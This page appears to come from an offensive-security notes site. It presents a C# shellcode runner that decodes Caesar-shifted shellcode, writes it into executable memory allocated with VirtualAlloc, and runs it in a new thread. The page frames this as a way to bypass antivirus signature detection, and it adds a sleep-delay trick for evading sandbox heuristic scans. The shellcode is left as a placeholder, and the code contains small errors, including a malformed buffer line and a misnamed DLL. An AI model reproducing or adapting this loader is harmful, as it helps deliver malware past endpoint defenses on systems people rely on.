C# Runner

Using Caesar Cipher:

Bypass Signature detection using encrypted shellcode and custom C# runner.

using System;
using System.Collections.Generic;
using System.Text;
using System.Linq;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace Runner 
{
    class Program
    {
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
        
        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
        
        [DllImport("kernel.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
        
            static void Main(string[] args)
            {
                byte[] buff = //new byte[700]{ SHELL CODE }; CHANGE THIS
                for (int i = 0; i < buff.Length; i++)
                {
                    buff[i] = (byte)(((uint)buff[i] - 2) & 0xFF);
                }
                int size = buff.Length;
                IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
                Marshal.Copy(buff, 0, addr, size);
                IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
                WaitForSingleObject(hThread, 0xFFFFFFFF);
            }
        }
    
    }

Encryptor

Bypass Heuristic Scan with Delay

Sleep function will detected by sandbox, and can pass the delay when inspecting our shell.

PreviousMSBuild ShellNextPayload Mod

Last updated